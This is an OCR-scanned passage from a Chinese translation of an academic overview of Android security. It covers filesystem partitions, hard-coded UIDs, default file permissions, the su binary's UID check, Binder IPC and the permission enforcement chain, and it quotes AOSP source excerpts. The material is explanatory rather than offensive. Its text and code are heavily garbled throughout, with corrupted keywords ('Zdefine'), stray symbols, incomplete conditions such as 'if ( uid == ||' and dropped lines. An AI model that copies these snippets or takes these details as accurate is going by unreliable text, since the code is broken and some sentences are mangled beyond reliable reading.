11 -rwxr-x--- root root 18247 1970-01-01 00 : 00 init . rc 

12 -rwxr-x--- root root 1795 1970-01-01 00 : 00 init . trace . rc 
13 -rwxr-x--- root root 3915 1970-01-01 00 : 00 init . usb . rc 

14 drwxrwxr-x root system 2013-04-10 08 : 13 mnt 

15 dr-xr-xr-x root root 2013-04-10 08 : 13 proc 

16 drwx------ root root 2012-11-15 05 : 31 root 

17 drwxr-x--- root root 1970-01-01 00 : 00 sbin 

18 lrwxrwxrwx root root 2013-04-10 08 : 13 sdcard -» /mnt/sdcard 

19 d---r-x--- root sdcard r 2013-04-10 08 : 13 storage 

20 drwxr-xr-x root root 2013-04-10 08 : 13 sys 

21 drwxr-xr-x root root 2012-12-31 03 : 20 system 

22 -rw-r--r-- root root 272 1970-01-01 00 : 00 ueventd . goldfish . rc 
23 -rw-r--r-- root root 4024 1970-01-01 00 : 00 ueventd . rc 

24 lrwxrwxrwx root root 2013-04-10 08 : 13 vendor -> /system/vendor 
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代码 3.4 : Android 文件 系统 


/system 分 区 包含 整个 Android 操作 系统 ， 除 了 Linux 内 核 ， 它 本 身 位 于 /boot 分 区 上 。 
文件 夹 包含 子 目录 /system/bin 和 /system/lib ， 它 们 相应 包含 核心 本 地 可 执行 文件 和 共享 

此 外 ， 此 分 区 包含 由 系统 映像 预先 构建 的 所 有 系统 应 用 。 映像 以 只 读 模式 安装 (参见 清 
单 3.2 中 的 第 5 行 ) 。 因 此 ， 此 分 区 的 内 容 不 能 在 运行 时 更 改 。 


因此 ， /system 分 区 被 挂 载 为 只 读 ， 它 不 能 用 于 存储 数据 。 为 此 ， 单 独 的 分 区 /data 负责 存 
储 随时 间 改 变 的 用 户 数据 或 信息 。 > /data/app 目录 包含 已 安装 应 用 程序 的 所 有 apk © 
件 ， 而 /data/data 文件 夹 包含 应 用 程序 的 home 目录 。 


/cache 分 区 负责 存储 经 常 访 问 的 数据 和 应 用 程序 组 件 。 此 外 ， 操 作 系 统 无 线 更 新 ( 卡 刷 ) 也 
在 运 aoo 区 上 。 


因此 ， 在 Android 的 编译 期 间 生 成 /system ， /data 和 /cache ， 这 些 映像 上 包含 的 文件 和 文 
件 夹 的 默认 权限 和 所 有 者 必须 在 编译 时 定义 。 这 意味 着 在 编译 此 操作 系统 期 间 ， 用 户 和 组 
UID 和 GID 应 该 可 用 。 Android 文件 系统 配置 文件 ( 见 清单 3.5) 包含 预定 义 的 用 户 和 组 的 
列表 。 应 该 提 到 的 是 ， 一 些 行 中 的 值 (例如 ， 参 见 第 10 行 ) 对 应 于 在 Linux 内 核 层 上 定义 的 
值 ， 如 第 2.2 节 所 述 。 


此 外 ， 文 件 和 文件 夹 的 默认 权限 ， 所 有 者 和 所 有 者 组 定义 在 该 文件 中 ( 见 清单 3.6) 。 这些 
规则 由 fs config() 函数 解析 并 应 用 ， 它 在 这 个 文件 的 末尾 定义 。 此 函数 在 映像 组 装 期 间 调 
用 o 


Zdefine AID ROOT O /* traditional unix root user */ 
Zdefine AID SYSTEM 1000 /* system server */ 

Zdefine AID RADIO 1001 /* telephony subsystem , RIL */ 
Zdefine AID BLUETOOTH 1002 /* bluetooth subsystem */ 
Zdefine AID GRAPHICS 1003 /* graphics devices */ 
#define AID INPUT 1004 /* input devices */ 

Zdefine AID AUDIO 1005 /* audio devices */ 

Zdefine AID CAMERA 1006 /* camera devices */ 
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10 #define AID_INET 3003 /* can create AF_INET and AF_INET6 sockets */ 
12 #define AID_APP 10000 /* first app user */ 


14 static const struct android_id_info android_ids [ ] = { 


15 { "root" , AID ROOT, }, 

16 { "system" , AID SYSTEM, }, 

17  £ "radio" , AID RADIO, }, 

18 1 "bluetooth" , AID BLUETOOTH, }, 
19 { "graphics" , AID GRAPHICS, }, 
20  £ "input" , AID INPUT, }, 

21 { "audio" , AID AUDIO, }, 

22 { "camera" , AID CAMERA, }, 

23 o4 

24 { "inet" , AID INET, }, 

25 Tug 

26 }; 


代码 3.5 : Android 中 硬 编码 的 UID 和 GID， 以 及 它们 到 用 户 名 称 的 映射 


3.2.1 本 地 可 执行 文件 的 保护 


在 清单 3.6 中 可 以 看 到 一 些 二 进 制 文件 分 配 有 setuid 和 setgid 访问 权限 标志 。 例 如 ， su 程 
序 设置 了 E 。 这 个 众所周知 的 工具 允许 用 户 运 行 具有 指定 的 UID 和 GID 的 程序 。 在 Linux 
中 ， 此 功能 通常 用 于 运行 具有 超级 用 户 权 限 的 程序 。 根 据 列表 3.6， 二 进 

制 /system/xbin/su 的 访问 权限 分 配 为 “06755" ( 见 第 21 行 ) 。 第 一 个 非 零 数 "6" 意 味 着 该 二 
进 制 具有 setuid 和 setgid ( 4 « 2 ) 访问 权限 标志 集 。 通 常 ， 在 Linux 中 ， 可 执行 文件 以 与 
启动 它 的 进程 相同 的 权限 运行 。 这 些 标签 允许 用 户 使 用 可 执行 所 有 者 或 组 的 权限 运行 程序 
[11]。 因 此 ， 在 我 们 的 例子 中 ， binary/system/xbin/su 将 以 root 用 户 身份 运行 。 这 些 root 权 


ee de UDIN A 
后 ，su 可 以 使 用 指定 的 UID 和 GID 启动 提供 的 程序 (例如 ， 参 见 行 22) 。 因 此 ， 程 序 将 以 
所 需 的 UID fe GID 启动 。 


在 特权 程序 的 情况 下 ， 需 要 限制 可 访问 这 些 工具 的 应 用 程序 的 范围 。 在 我 们 的 这 里 ， 没 有 这 
样 的 限制 ， 任 何 应 用 程序 可 以 运行 su 程序 并 获得 root 级 别 的 权限 。 在 Android 中 ， 通 过 将 
调用 程序 的 UID 与 允许 运行 它 的 UID 列表 进行 比较 ， 来 对 本 地 用 户 空间 层 实现 这 种 限制 。 因 
此 ， 在 第 9 行 中 ， su 可 执行 文件 获得 进程 的 当前 UID， 它 等 于 调用 它 的 进程 的 UID， 在 

第 10 行 ， 它 将 这 个 UID 与 允许 的 UID 的 预定 列表 进行 比较 。 因此 ， 只 有 在 调用 进程 的 UID 
等 于 AID Roor 或 AID SHELL 时 ， su 工具 才 会 启动 。 为 了 执行 这 样 的 检查 ， su 导入 在 
Android 中 定义 的 UID 常量 ( 见 第 1 行 ) 。 


dE RUeSEROSEd Sectores 

2 static struct fs path config android dirs [ ] = { 
3 { 00770 , AID SYSTEM, AID CACHE, "cache" } , 

4  { 00771 , AID SYSTEM, AID SYSTEM, "data/app" } , 
5 on 

6 { 00777 , AID ROOT, AID ROOT, "sdcard" } , 

T { 00755 , AID_ROOT, AID_ROOT, 0 }, 

8 j; 

9 
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11 static struct fs path config android files [ ] = { 


42 48 

13 { 00644 , AID SYSTEM, AID SYSTEM, "data/app/*" } , 

14 { 00644 , AID MEDIA RW, AID MEDIA RW, "data/media/*" } , 
15 { 00644 , AID SYSTEM, AID SYSTEM, "data/app-private /*" ) , 
16 { 00644 , AID APP, AID APP, "data/data/*" ) , 

17 TU 

18  1( 02755 , AID ROOT, AID NET RAW, "system/bin/ping" ) , 
19 { 02750 , AID ROOT, AID INET, "system/bin/netcfg" } , 

20 445 

2 { 06755 , AID ROOT, AID ROOT, "system/xbin/su" } , 

22 TR 

23 { 06750 , AID_ROOT, AID_SHELL, "system/bin/run-as" } , 
24 { 00755 , AID ROOT, AID SHELL, "system/bin/*" } , 

25 sn 

26 { 00644 , AID ROOT, AID ROOT, 0}, 

20 


代码 3.6 : 默认 权限 和 所 有 者 


此 外 ， 在 较 新 的 版 本 (从 4.3 开始 ) > Android 核心 开发 人 员 开 始 使 用 Capabilities Linux 内 
核 系统 [4]。 这 允许 它们 额外 限制 需要 以 root 权限 运行 的 程序 的 权限 。 例如 ， 对 于 su 程序 来 
说 ， 它 不 需要 具有 root 用 户 的 所 有 特权 。 对 于 这 个 程序 ， 它 足以 有 能 力 修改 当前 的 UID 和 
GID » 因此 ， 此 工具 只 需要 CAP_SETUID 和 CAP_SETGID root 权限 来 正常 运行 。 


Android 本 地 用 户 空间 ， 
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#include <private/android_filesystem_config.h> 


int main( int argc, char **argv ) 
{ 

struct passwd *pw; 

int uid, gid, myuid ; 


/* Until we have something better , only root and the shell can use su 
myuid = getuid () ; 
if (myuid != AID_ROOT && myuid != AID_SHELL) { 


fprintf ( stderr, "su : uid %d not allowed to su\n", myuid) ; 
Petunn 

} 

if ( setgid ( gid ) || setuid ( uid ) ) { 


fprintf (stderr, «sú n permission denired\na) y 
return E, 

} 

/* User specified command for exec . */ 


if ( argc == 3 ) { 
if ( execlp ( argv[2], argv[2], NULL) < 0) { 


fprintf ( stderr , "su : exec failed for %s Error:%s\n" , argv [2] , 
strerror ( errno ) ) ; 
return -errno ; 
} 
} 


代码 3.7 : su 程序 的 源 代码 


Ey 


第 四 章 Android 框架 层 安全 


来 源 : Yury Zhauniarovich | Publications 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


如 我 们 在 第 1.2 节 中 所 描述 的 那样 ， 应 用 程序 框架 级 别 上 的 安全 性 由 IPC 引用 监视 器 实现 。 在 
4.1 节 中 ， 我 们 以 Android 中 使 用 的 进程 间 通 信和 系统 的 描述 开始 ， 讲 解 这 个 级 别 上 的 安全 机 
制 。 之 后 ， 我 们 在 4.2 节 中 引入 权限 ， 而 在 4.3 节 中 ， 我 们 描述 了 在 此 级 别 上 实现 的 权限 实 


4.1 Android Binder 框架 


如 2.1 节 所 述 ， 所 有 Android 应 用 程序 都 在 应 用 程序 沙 箱 中 运行 。 粗 略 地 说 ， 应 用 程序 的 沙 
箱 通 过 在 带 有 不 同 Linux 身份 的 不 同 进程 中 运行 所 有 应 用 程序 来 保证 。 此 外 ， 系 统 服务 也 在 
具有 更 多 特权 身份 的 单独 进程 中 运行 ， 允 许 它们 使 用 Linux Kernel DAC 功能 ， 访 问 受 保护 的 
系统 不 同 部 分 (参见 第 2.1, 2.2 和 1.2 节 ) 。 因 此 ， 需 要 进程 间 通 信 (IPC) 框架 来 管理 不 同 
进程 之 间 的 数据 和 信号 交换 。 在 Android 中 ， 一 个 称 为 Binder 的 特殊 框架 用 于 进程 间 通 信 
[12]。 标 准 的 Posix System V IPC 框架 不 支持 由 Android 实现 的 Bionic libc Æ (参见 这 

€) 。 此 外 ， 除 了 用 于 一 些 特殊 情况 的 Binder 框架 ， 也 会 使 用 Unix 域 套 接 字 (例如 ， 用 于 
与 Zygote 守护 进程 的 通信 ) ， 但 是 这 些 机 制 不 在 本 文 的 考虑 范围 之 内 。 


Binder 框架 被 特地 重新 开发 来 在 Android 中 使 用 。 它 提 供 了 管理 此 操作 系统 中 的 进程 之 间 的 
所 有 类 型 的 通信 所 需 的 功能 。 基 本 上 ， 甚 至 应 用 程序 开发 人 员 熟 知 的 机 制 ， 例 

如 Intents 和 ContentProvider ， 都 建立 在 Binder 框架 之 上 。 这 个 框架 提供 了 多 种 功能 ， 例 
如 可 以 调用 远程 对 象 上 的 方法 ， 就 像 本 地 对 象 那样 ， 以 及 同步 和 异步 方法 调用 ，Link to 
Death ( 某 个 进程 的 Binder 终止 时 的 自动 通知 ) ， 跨 进程 发 送 文 件 描述 符 的 能 力 等 等 [12,16] 


o 


根据 由 客户 端 -服务 器 同步 模型 组 织 的 进程 之 间 的 通信 。 客 户 端 发 起 连接 并 等 待 来 自 服务 端的 
回复 。 因此 ， 客 户 端 和 服务 器 之 间 的 通信 可 以 被 想象 为 在 相同 的 进程 线程 中 执行 。 这 为 开发 
人 员 提 供 了 调用 远程 对 和 象 上 的 方法 的 可 能 性 ， 就 像 它 们 是 本 地 的 一 样 。 通过 Binder 的 通信 模 
型 如 图 4.1 所 示 。 在 这 个 图 中 ， 客 户 端 进 程 A 中 的 应 用 程序 想 要 使 用 进程 B [12] 中 运行 的 服 
务 的 公开 行为 。 
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使 用 Binder 框架 的 客户 端 和 服务 之 间 的 所 有 通信 ， 都 通过 Linux 内 核 驱动 程 

Fe /dev/binder 进行 。 此 设备 驱动 程序 的 权限 设置 为 全 局 可 读 和 可 写 ( 见 3.1 节 中 的 清单 3.3 
中 的 第 3 行 ) 。 因 此 ， 任 何 应 用 程序 可 以 写 入 和 读 取 此 设备 。 为 了 隐藏 Binder 通信 协议 的 特 
性 ， libbinder 库 在 Android 中 使 用 。 它 提供 了 一 种 功能 ， 使 内 核 驱 动 程序 的 交互 过 程 对 应 

用 程序 开发 人 员 透 明 。 尤 其 是 ， 客 户 端 和 服务 器 之 间 的 所 有 通信 通过 客户 端 侧 的 代理 和 服务 

器 侧 的 桩 进行 。 代 理 和 桩 负责 编码 和 解码 数据 和 通过 Binder 驱动 程序 发 送 的 命令 。 为 了 使 用 
代理 和 桩 ， 开 发 人 员 只 需 定义 一 个 AIDL 接口 ， 在 编译 应 用 程序 期 间 将 其 转换 为 代理 和 桩 。 在 
服务 端 ， 调 用 单独 的 Binder 线程 来 处 理 客 户 端 请 求 。 


从 技术 上 讲 ， 使 用 Binder 机 制 的 每 个 公开 服务 (有 时 称 为 Binder 服务 ) 都 分 配 有 标识 。 内 核 
驱动 程序 确保 此 32 位 值 在 系统 中 的 所 有 进程 中 是 唯一 的 。 因 此 ， 此 标识 用 作 Binder 服务 的 
句柄 。 拥 有 此 句柄 可 以 与 服务 交互 。 然 而 ， 为 了 开始 使 用 服务 ， 窜 户 端 首先 必须 找到 这 个 
值 。 服 务 句 柄 的 发 现 通过 Binder 的 上 下 文 管理 器 ( servicemanager 是 Android Binder 的 上 下 
文 管理 器 的 实现 ， 在 这 里 我 们 互 换 使 用 这 些 概念 ) 来 完成 。 上 下 文 管理 器 是 一 个 特殊 的 
Binder 服务 ， 其 预定 义 的 句柄 值 等 于 0 ( 指 代 清 单 4.1 的 第 8 行 中 获得 的 东西 ) 。 因 为 它 有 
一 个 国定 的 句柄 值 ， 任 何 一 方 都 可 以 找到 它 并 调用 其 方法 。 基 本 上 ， 上 下 文 管理 器 充当 名 称 
服务 ， 通 过 服务 的 名 称 提供 服务 句柄 。 为 了 实现 这 个 目的 ， 每 个 服务 必须 注册 上 下 文 管理 器 
(例如 ， 使 用 第 26 行 中 的 ServiceManager 类 的 addservice 方法 ) 。 因 此 ， 客 户 端 可 以 仅 知 
道 与 其 通信 的 服务 名 称 。 使 用 上 下 文 管理 器 来 解析 此 名 称 (请 参阅 getservice 第 12 行 ) ， 
£ PF MERE AT SME LOI © Binder BARRA AHEREALTL ERE 
因此 ， servicemanager 是 由 Android 启动 的 第 一 个 服务 之 一 〈 见 第 3.1 
TY) ° servicemanager 组 件 确保 了 只 允许 特权 系统 标识 注册 服务 。 


Binder 框架 本 身 不 实施 任何 安全 性 。 同时 ， 它 提供 了 在 Android 中 实施 安全 性 的 设施 。 

Binder 驱动 程序 将 发 送 者 进程 的 UID 和 PID 添加 到 每 个 事务 。 因此 ， 由 于 系统 中 的 每 个 应 
用 具有 其 自己 的 UID， 所 以 该 值 可 以 用 于 识别 调用 方 。 调 用 的 接收 者 可 以 检查 所 获得 的 值 并 

且 决 定 是 否 应 该 完成 事务 。 接收 者 可 以 调 

用 android.os.Binder. getCallingUid() 和 android.os.Binder. getCallingPid() [12] 来 获得 发 送 

者 的 UID fe PID 。 另 外 ， 由 于 Binder 多 柄 在 所 有 进程 中 的 唯一 性 和 其 值 的 模糊 性 [14]， 它 也 

可 以 用 作 安 全 标识 。 


1 public final class ServiceManager { 

2 T 

3 private static IServiceManager getIServiceManager() { 
4 if ( sServiceManager != null ) ( 

5 return sServiceManager ; 

6 
i 


// Find the service manager 


8 sServiceManager = ServiceManagerNative.asInterface( BinderInternal.getContextOb 
ject() ); 

9 return sServiceManager ; 

10 } 

"sp 

12 public static IBinder getService ( String name) { 

13 Ey 

14 IBinder service = sCache . get (name) ; 

15 if ( service != null ) { 

16 return service ; 

abr } else { 

18 return getIServiceManager().getService(name); 

19 

20 } catch (RemoteException e) { 

21 Log.e(TAG, "error in getService", e); 

22 } 

23 return null; 

2v. m 

25 

26 public static void addService( String name, IBinder service, boolean allowIsolate 
d) { 

2 try { 

28 getIServiceManager().addService(name, service, allowIsolated ); 
29 } catch (RemoteException e) { 

30 Log.e(TAG, "error in addService" , e); 

SHl 

on} 

33 

34 } 


代码 4.1: ServiceManager 的 源码 


4.2 Android 权限 


如 我 们 在 2.1 节 中 所 设计 的 那样 ， 在 Android 中 ， 每 个 应 用 程序 默认 获得 其 自己 的 UID 和 
GID 系统 标识 。 此 外 ， 在 操作 系统 中 还 有 一 些 硬 编码 的 标识 (参见 清单 3.5) 。 这 些 身份 用 
于 使 用 在 Linux 内 核 级 别 上 实施 的 DAC， 分 离 Android 操作 系统 的 组 件 ， 从 而 提高 操作 系统 
的 整体 安全 性 。 在 这 些 身份 中 ， am SYSTEM 最 为 显著 。 此 UID. 用 于 运行 系统 服务 器 


( system server ) ， 这 个 组 件 统一 了 由 Android 操作 系统 提供 的 服务 。 系统 服务 器 具有 访 
问 操作 系统 资源 ， 以 及 在 系统 服务 器 内 运行 的 每 个 服务 的 特权 ， 这 些 服 务 提供 对 其 他 OS 组 
件 和 应 用 的 特定 功能 的 受 控 访问 。 此 受 控 访问 基于 权限 系统 。 


正如 我 们 在 4.1 节 中 所 提 及 的 ，Binder 框架 向 接收 方 提供 了 获 ROO MDa ID tae o 
在 一 般 情况 下 ， 该 功能 可 以 由 服务 利用 来 限制 想 要 连接 到 服务 的 消费 者 。 这 可 以 通过 将 消费 
者 的 UID 和 PID 与 服务 所 允许 的 UID 列表 进行 比较 来 实现 。 然 而 ， 在 Android 中 ， 这 种 功能 
以 略微 不 同 的 方式 来 实现 。 服 务 的 每 个 关键 功能 (或 简单 来 说 是 服务 的 方法 ) 被 称 为 权限 的 
特殊 标签 保护 。 粗 略 地 说 ， 在 执行 这 样 的 方法 之 前 ， 会 检查 调用 进程 是 否 被 分 配 了 权限 。 如 
果 调 用 进程 具有 所 需 权 限 ， 则 允许 调用 服务 。 否 则 ， 将 抛 出 安全 检查 蜡 常 GR 

常 ， SecurityException ) 。 例 如 ， 如 果 开 发 者 想 要 向 其 应 用 程序 提供 发 送 短 信 的 功能 ， 则 必 
须 将 以 下 行 添 加 到 应 用 程序 的 AndroidManifest.xml 文件 

中 : <uses-permission android:name ="android.permission.SEND_SMS"/> 。Android 还 提供 了 一 


组 特殊 调用 ， 人 允许 在 运行 时 检查 服务 使 用 者 是 否 已 分 配 权限 。 


到 目前 为 止 所 描述 的 权限 模型 提供 了 一 种 强化 安全 性 的 有 效 方法 。 同时 ， 这 个 模型 是 无 效 
的 ， 因 为 它 认为 所 有 的 权限 是 相等 的 。 在 移动 操作 系统 的 情况 下 ， 所 提供 的 功能 在 安全 意义 
上 并 不 总 是 相等 。 例 如 ， 安 装 应 用 程序 的 功能 比 发 送 SMS 的 功能 更 重要 ， 相 反 ， 发 送 SMS 
的 功能 比 设 置 警告 或 振动 更 危险 。 


这 个 问题 在 Android 中 通过 引入 权限 的 安全 级 别 来 解决 。 有 四 个 可 能 的 权限 级 

别 : normal ， dangerous ， signature 和 signatureOrSystem 。 权 限 级 别 要 么 硬 编 码 到 
Android 操作 系统 (对 于 系统 权限 ) ， 要 么 由 自 定义 权限 声明 中 的 第 三 方 应 用 程序 的 开发 者 分 
配 。 此 级 别 影响 是 否决 定向 请 求 的 应 用 程序 授予 权限 。 为 了 被 授予 权限 ， 正 常 的 权限 可 以 只 
在 应 用 程序 的 AndroidManifest.xml 文件 中 请 求 。 危 险 权限 除了 在 清单 文件 中 请 求 之 外 ， 还 必 
须 由 用 户 批准 。 在 这 种 情况 下 ， 安 装 应 用 程序 期 间 ， 安 装 包 所 请 求 的 权限 集会 显示 给 用 户 。 
如 果 用 户 批 准 它们 ， 则 安装 应 用 程序 。 否 则 ， 安 装 将 被 取消 。 如 果 请 求 权 限 的 应 用 与 声明 它 
的 应 用 拥有 相同 签名 ， (6.1 中 提 到 了 Android 中 的 应 用 程序 签名 的 用 法 ) ， 系 统 将 授 

T signature 权限 。 如 果 请 求 的 权限 应 用 和 声明 权限 的 使 用 相同 证 书签 名 ， 或 请 求 应 用 位 于 
系统 映像 上 ， 则 授予 signatureorsystem 权限 。 因 此 ， 对 于 我 们 的 n bue 功能 被 正常 级 别 
的 权限 保护 ， 发 送 SMS 的 功能 被 危险 级 别 的 权限 保护 ， 以 及 软件 包 安 装 功能 

被 signatureorSystem 权限 级 别 保护 。 


4.2.1 系统 权限 定义 


用 于 保护 Android 操作 系统 功能 的 系统 权限 在 框架 的 AndroidManifest.xml 文件 中 定义 ， 位 于 
Android 源 的 frameworks/base/core/res 文件 夹 中 。 这 个 文件 的 一 个 摘录 包含 一 些 权 限定 义 的 
例子 ， 如 代码 清单 4.2 Re 在 这 些 示例 中 ， 展 示 了 用 于 保护 发 送 SMS， 振 动 器 和 包 安 装 功 
能 的 权限 声明 。 


1 <manifest xmlns:android=" http://schemas.android.com/apk/res/android" 
2 package="android" coreApp="true" android: sharedUserId="android.uid.system" 
3 android: sharedUserLabel="@string/android_system_label "> 

4 400 

5 <!-- Allows an application to send SMS messages. > 

6 «permission android:name-"android.permission.SEND SMS" 

Ti android:permissionGroup-"android.permission-group.MESSAGES" 

8 android:protectionLevel-"dangerous" 

9 android:permissionFlags-"costsMoney" 

10 android: label="@string/permlab_sendSms" 

alal android:description="@string/permdesc _sendSms" /> 

12 400 

13 <i ALlToOwsS access to the vibrator ——= 

14 <permission android:name-"android.permission.VIBRATE" 

15 android:permissionGroup-"android.permission-group.AFFECTS BATTERY" 
16 android: protectionLevel="normal" 

17 android:label="@string/permlab_vibrate" 

18 android:description="@string/permdesc_vibrate" /> 

19 an 

20 <!-- Allows an application to install packages. --> 

21 «permission android:name-"android.permission.INSTALL PACKAGES" 

22 android: label="@string/permlab_installPackages" 

23 android:description-"Qstring/permdesc installPackages" 

24 android: protectionLevel="Signature|system" /> 

25 


26 </manifest> 


代码 4.2 : 系统 权限 的 定义 


默认 情况 下 ? 第 三 方 应 用 程序 的 开发 人 员 无 法 访问 受 Signature 和 signatureOrSystem 级 别 的 
系统 权限 保护 的 功能 。 这 种 行为 以 以 下 方式 来 保证 : 应 用 程序 框架 包 使 用 平台 证 书签 名 。 
此 ， 需 要 使 用 这 些 级 别 的 权限 保护 的 功能 的 应 用 程序 必须 使 用 相同 的 平台 证 书 进行 签名 。 然 
而 ， 仅 有 操作 系统 的 构建 者 才 可 以 访问 该 证 书 的 私 钥 ， 通 常 是 硬件 生产 者 (他 们 自己 定制 
Android) 或 电信 运营 商 (使 用 其 修改 的 操作 系统 映像 来 分 发 设备 ) 。 


4.2.2 权限 管理 


系统 服务 PackageManagerservice 负责 Android 中 的 应 用 程序 管理 。 此 服务 有 助 于 在 操作 系统 
中 安装 ， 印 载 和 更 新 应 用 程序 。 此 服务 的 另 一 个 重要 作用 是 权限 管理 。 基 本 上 ， 它 可 以 被 认 
为 是 一 个 策略 管理 的 要 素 。 它 存储 了 用 于 检查 Android 包 是 否 分 配 了 特定 权限 的 信息 。 此 
外 ， 在 应 用 程序 安装 和 升级 期 间 ， 它 执行 一 堆 检查 ， 来 确保 在 这 些 过 程 中 不 违反 权限 模型 的 
完整 性 。 此 外 ， 它 还 作为 一 个 策略 判定 的 要 素 。 此 服务 的 方法 《我 们 将 在 后 面 展示 ) 是 权限 
检查 链 中 的 最 后 一 个 元 素 9 我 们 不 会 在 这 里 考虑 PackageManagerService 的 操作 o 然而， 感 兴 
趣 的 读者 可 以 参考 [15,19] 来 获得 如 何 执行 应 用 安装 的 更 多 细节 。 


PackageManagerService 将 所 有 第 三 方 应 用 程序 的 权限 的 相关 信 息 存储 

在 /data/system/packages.xml [7] 中 。 该 文件 用 作 系 统 重 新 启动 之 间 的 永久 存储 器 。 但 是 ， 在 
运行 时 ， 所 有 有 关 权 限 的 信息 都 保存 在 RAM 中 ， 从 而 提高 系统 的 响应 速度 。 在 启动 期 间 ， 
此 信息 使 用 存储 在 用 于 第 三 方 应 用 程序 的 packages.xml 文件 中 的 数据 ， 以 及 通过 解析 系统 应 
用 程序 来 收集 。 


4.2.3 Android 框架 层 的 权限 实施 


为 了 了 解 Android 如 何在 应 用 程序 框架 层 强制 实施 权限 ， 我 们 考虑 Vibrator 服务 用 法 。 在 清 
单 4.3 的 第 6 行 中 ， 展 示 了 振动 器 服务 如 何 保护 其 方法 vibrate 的 示例 。 这 一 行 检 查 了 调用 
组 件 是 否 分 配 有 由 常量 android.Manifest.permission.VIBRATE 定义 的 标 

签 android.permission. VIBRATE ° Android 提供 了 几 种 方法 来 检查 发 送 者 (或 服务 使 用 者 ) 是 
否 已 被 分 配 了 权限 。 在 我 们 这 个 库 ， 这些 设施 由 方法 checkCallingOrSelfPermission 表示 ? 
除了 这 种 方法 ， 还 有 许多 其 他 方法 可 以 用 于 检查 服务 调用 者 的 权限 。 


1 public class VibratorService extends IVibratorService.Stub 

2 implements InputManager.InputDeviceListener { 

3 T 

4 public void vibrate ( long milliseconds, IBinder token ) £ 

5 if (mContext.checkCallingOrSelfPermission(android.Manifest.permission.VIBRATE) 
6 != PackageManager.PERMISSION GRANTED) { 

n throw new SecurityException("Requires VIBRATE permission"); 
8 } 

9 m 

10 } 

11 

ae 


代码 4.3 : 权限 的 检查 


方法 checkcallingorSelfPermission 的 实现 如 清单 4.4 所 示 。 在 第 24 行 中 ， 方 
法 checkPermission 被 调用 。 它 接收 uid 和 pid 作为 Binder 框架 提供 的 参数 。 


1 class ContextImpl extends Context { 

2 20-4 

3 @Override 

4 public int checkPermission ( String permission, int pid, int uid ) { 
5 if ( permission -- null ) ( 

6 throw new IllegalArgumentException ("permission is null ") ; 
7 } 

8 

9 try { 
10 return ActivityManagerNative.getDefault().checkPermission( 
all permission, pid, uid ); 
12 } catch (RemoteException e) { 
13 return PackageManager .PERMISSION_DENIED; 
14 } 
15 } 
16 


Ty @Override 

18 public int checkCallingOrSelfPermission ( String permission ) { 
19 if ( permission == null ) { 

20 throw new IllegalArgumentException("permission is null"); 
21 } 


23 return checkPermission( permission, Binder. getCallingPid(), 
24 Binder.getCallingUid() ); 


代码 4.4 : ContextImpl 类 的 摘录 


在 第 11 行 中 ? 检查 被 重 定 向 到 ActivityManagerService 类 ， 继 而 在 ActivityManager 组 件 的 
方法 checkcomponentPermission 中 执行 实际 检查 。 此 方法 的 代码 如 清单 4.5 所 示 。 在 第 4 行 
中 它 检查 调用 者 UID 是 否 拥 有 特权 。 具有 root 和 系统 UID 的 组 件 由 具有 所 有 权限 的 系统 授 


1 public static int checkComponentPermission ( String permission, int uid, 
2 int owningUid, boolean exported ) { 

3 // Root , system server get to do everything 

4 if ( uid == || uid == Process.SYSTEM_UID) { 

5 return PackageManager .PERMISSION_GRANTED ; 

6 
HW 
8 


// Isolated processes don ' t get any permissions 
if ( UserId.isIsolated ( uid ) ) { 
9 return PackageManager.PERMISSION DENIED; 


T4 // If there is a uid that owns whatever is being accessed , it has 
12 // blanket access to it regardless of the permissions it requires 
13 if (owningUid >= 0 && UserId.isSameApp(uid, owningUid) ) { 

14 return PackageManager .PERMISSION GRANTED; 


16 // If the target is not exported , then nobody else can get to it 
zu if (!exported) { 


18 Slog.w(TAG, "Permission denied: checkComponentPermission() owningUid=" + owning 
Uid) ; 

19 return PackageManager .PERMISSION_DENIED; 

20 3} 

21 if ( permission == null ) { 

22 return PackageManager.PERMISSION GRANTED; 

23 m; 

24 try { 

25 return AppGlobals.getPackageManager ( ) 

26 .checkUidPermission ( permission , uid ) ; 

27 } catch (RemoteException e) { 

28 // Should never happen , but if it does . . . deny ! 
29 Slog.e(TAG, "PackageManager is dead ?!?" , e) ; 

30 } 

31 return PackageManager.PERMISSION DENIED; 

32 } 


x 


代码 4.5 : ActivityManager 的 checkComponentPermission 方法 。 


在 清单 4.5 的 第 26 行 中 ， 权 限 检 查 被 重 定向 到 包 管 理 器 ， 将 其 转发 

到 PackageManagerservice 。 正如 我 们 前 面 解释 的 ， 这 个 服务 知道 分 配给 Android 包 的 权限 。 
执行 权限 检查 的 packageManagerservice 方法 如 清单 4.6 所 示 。 在 第 7 行 中 ， 如 果 将 权限 授予 
由 其 UID 定义 的 Android 应 用 程序 ， 则 会 执行 精确 检查 。 


1 public int checkUidPermission ( String permName, int uid ) { 

2 final boolean enforcedDefault = isPermissionEnforcedDefault(permName); 
3 synchronized (mPackages) { 

4 Object obj - mSettings.getUserIdLPr( UserHandle.getAppId( uid ) ); 
5 if ( obj != null ) ( 

6 GrantedPermissions gp = ( GrantedPermissions ) obj ; 

© if (gp.grantedPermissions.contains (permName) ) { 

8 return PackageManager.PERMISSION GRANTED; 

9 

10 ) else { 

alat HashSet<String> perms = mSystemPermissions.get ( uid ) ; 

12 if (perms != null && perms.contains (permName) ) { 

13 return PackageManager .PERMISSION_GRANTED; 

14 } 

15 

16 if (!isPermissionEnforcedLocked (permName, enforcedDefault ) ) ( 
w return PackageManager .PERMISSION_GRANTED; 

18 } 

19 ) 

20 return PackageManager .PERMISSION DENIED; 

21 3} 


代码 4.6 : PackageManagerService 的 checkUidPermission 方法 


第 五 章 Android 应 用 层 安 全 


来 源 : Yury Zhauniarovich | Publications 
译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 


虽然 在 这 一 节 中 我 们 描述 了 应 用 层 的 安全 性 ， 但 是 实际 的 安全 实施 ; 
述 的 底层 。 但是， 在 介绍 应 用 层 之 后 ， 我 们 更 容易 解释 Android 的 一 些 安全 功能 。 
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5.1 应 用 组 件 


Android 应 用 以 Android 软件 包 ( apk ) 文件 的 形式 分 发 。 一 个 包 由 Dalvik 可 执行 文件 ， 
资源 文件 ， 清 单 文件 和 本 地 库 组 成 ， 并 由 应 用 的 开发 人 员 使 用 自 签名 证 书签 名 。 每 个 
Android 应 用 由 四 个 组 件 类 型 的 几 个 组 件 组 成 : 活动 (Activity) ， 服 务 (Service) ， 广 播 接 
